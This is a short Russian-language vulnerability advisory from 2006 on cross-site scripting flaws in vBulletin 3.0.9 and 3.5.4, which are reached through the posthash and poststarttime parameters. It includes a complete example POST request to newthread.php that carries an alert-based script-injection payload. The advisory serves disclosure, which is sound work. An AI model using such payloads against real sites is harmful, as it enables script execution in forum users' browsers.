Дата публикации: | 25.04.2006 |
Дата изменения: | 06.04.2009 |
Всего просмотров: | 7259 |
Опасность: | Низкая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Межсайтовый скриптинг |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | vBulletin 3.x |
Уязвимые версии: vBulletin 3.0.9, возможно более ранние версии. vBulletin 3.5.4, возможно более ранние версии. Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах posthash и poststarttime в сценариях newreply.php и newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.0.9. 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.5.4. Пример:
POST /forum/newthread.php HTTP/1.0 Cookie: bbpda=1; bbthread_rate=1c6bfc06f109abf5078b2045c33e55a4ax1x-ix1yix5y_; bbcalview1=displaymonth; bbcalmonth=4; bbcalyear=2006; bbthread_lastview=394ad39f3930b09d1831a211b105b2d6ax1x-ix1ysx10x%221133126055%22y_; bbforum_view=888e1d7caeee8543b71b0312be1553edax2x-ix1yix1144526895yix3yix1144526913y_; bbpassword=a7aaf4a00945981be9f73671700f4027; bblastvisit=1144526894; bbsessionhash=ba9575585221066d61a0c88baa3fba4c; bbuserid=1 Content-Length: 312 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: www.vulnerable.ru Content-Type: application/x-www-form-urlencoded Referer: http://www.vulnerable.ru/forum/newthread.php?do=newthread&f=3 subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8 d3fe38b082b6d3381cbee17f1f1aca& poststarttime='%2Balert('Shanker')%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE% E2%F3%FE+%F2%E5%EC%F3&parseurl=1& disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&sti ckunstick=1&iconid=0 URL производителя: www.vbulletin.com Решение: Способов устранения уязвимости не существует в настоящее время. Об уязвимости сообщил Агиевич Игорь aka Shanker (shanker@mail.ru) |